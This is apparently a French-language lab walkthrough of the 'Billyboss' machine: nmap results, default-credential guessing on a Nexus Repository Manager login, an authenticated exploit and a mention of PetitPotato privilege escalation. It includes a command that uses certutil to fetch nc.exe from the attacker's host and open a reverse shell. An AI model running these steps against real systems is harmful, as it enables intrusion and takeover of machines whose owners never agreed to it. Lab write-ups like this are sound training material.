Salut ! On va faire maintenant la machine Billyboss, une machine facile qui nous enseigne que l'enumeration c'est vraiment tres important. Sans une bonne énumeration, nous ne pouvons rien faire. En cette machine j'ai appris une nouvelle maniere a chercher des credentials par defaux.

On commence avec l'énumeration des services du host. Ici on peut trouver deux services HTTP, un FTP et un SMB. Mais je peux vous dire que les deux derniers ont rien d'intéressant.

└─$ sudo nmap -sCV -T4 192.168.130.61 -oA detailedScan
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-02 15:46 EDT
Nmap scan report for 192.168.130.61
Host is up (0.099s latency).
Not shown: 994 closed tcp ports (reset)
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: BaGet
|_http-cors: HEAD GET POST PUT DELETE TRACE OPTIONS CONNECT PATCH
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
8081/tcp open  http          Jetty 9.4.18.v20190429
|_http-server-header: Nexus/3.21.0-05 (OSS)
| http-robots.txt: 2 disallowed entries 
|_/repository/ /service/
|_http-title: Nexus Repository Manager
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2025-09-02T19:47:06
|_  start_date: N/A
|_clock-skew: 1s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.36 seconds

Puis, on voit un service qui s'appelle Nexus au port 8081 avec une version de 3.21.0–05. Avec cette information, on peut chercher un potentiel exploit et voila, on retrouve un qui est seulement disponible authentiqué.

None

Maintenant, c'est le moment de visiter le site. Rien d'intéressant… A exception de ce login.

None

On attempte d'utiliser credentiels par defaut que j'ai trouvé dans le web, c'est a dire: admin, admin123, root, etc…

None

Mais avec cet methode, on peut trouver plus de credentiels. J'a vu cette technique en autre article et j'ai jamais cru que ca serait vraiment util, car il y a des occasions ou meme google ne montre pas tous les credentiaux par defaut du service.

None

On attempted une autre fois avec nexus:nexus et… voila !

None

On peut utiliser maintenant notre exploit, mais avant, il faut changer quelques parametres au script. Dans cet command, on telecharge netcat au host victime et on l'execute pour faire une conexion a notre addresse IP au port ou nous sommes en train d'écouter.

CMD='cmd.exe /c certutil -urlcache -f http://<your ip>/nc.exe nc.exe && nc.exe -e cmd <your ip> 4443'
None

Apres ca, on recoit notre shell avec l'user "nathan".

None

Impersonation

L'impersonation c'est un concept qui revient souvent dans l'OSCP et pour faire simple, c'est un tres dangereux privilege.

None

PetitPotato

Pour exploiter cet privilege, on peut utiliser le script de PetitPotato pour avoir NT Authority

None